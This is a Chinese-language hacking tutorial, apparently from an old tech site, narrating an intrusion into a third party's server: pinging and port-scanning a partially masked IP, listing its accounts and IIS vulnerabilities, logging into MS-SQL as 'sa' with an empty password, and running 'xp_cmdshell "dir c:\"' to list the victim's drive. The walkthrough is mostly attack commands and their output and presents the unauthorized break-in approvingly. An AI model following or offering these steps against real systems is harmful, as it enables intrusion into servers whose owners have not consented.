先ping出目标主机的IP地址:
连接IP主机: 211.154.xxx.xx...
发送 56 个字节...
接收到 56 个字节! 历时: 0毫秒
结论: IP主机正在与Internet连接中...
接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理):
主机信息
主机名:BEWDB01NOK
80(HTTP)
21(FTP Control)
25(SMTP)
443(HTTPS)
1433(MSSQL)
5631(PCAnyWhere)
用户列表
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin)
漏洞:
/\../readme.txt (HTTP: 200 )
/msadc/msadcs.dll (HTTP: 200 )
/iisadmpwd/achg.htr (HTTP: 200 )
/_AuthChangeUrl (HTTP: 200 )
/?PageServices (HTTP: 200 )
上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看,
21(FTP Control)
1433(MSSQL)
5631(PCAnyWhere)
只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从
1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx
Username为sa
password框空,连接:
SQL>Connecting 211.154.xxx.xx
SQL>Connected to 211.154.xxx.xx
呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell " "的形式运行任意dos指令了!dir一下试试看:
SQL>Command: xp_cmdshell "dir c:\"
驱动器 C 中的卷没有卷标。
卷的序列号是 5CBD-664C
卷的序列号是 5CBD-664C
c:\ 的目录
c:\ 的目录
01-12-20 08:13p <DIR> 2u2u
01-07-23 08:10p 0 AUTOEXEC.BAT
01-11-28 04:02p 84 biaoti.txt
01-07-23 08:10p 0 CONFIG.SYS
01-11-22 11:49a <DIR> InetPub
01-10-25 11:12a 15,360 kkkk.XLS
01-07-24 12:09p <DIR> MSSQL7
01-12-12 11:00a 134,217,728 pagefile.sys
01-11-30 10:59a <DIR> Program Files
01-09-04 02:43p 136 sp_attach.sql
01-12-20 04:12p <DIR> temp
01-09-27 11:14a <DIR> unzipped
01-12-15 12:09a <DIR> WINNT
13 个文件 134,233,308 字节
上一篇:配置RD9中的DNS
下一篇:Win Server 2003无盘终端网组建
|
精品推荐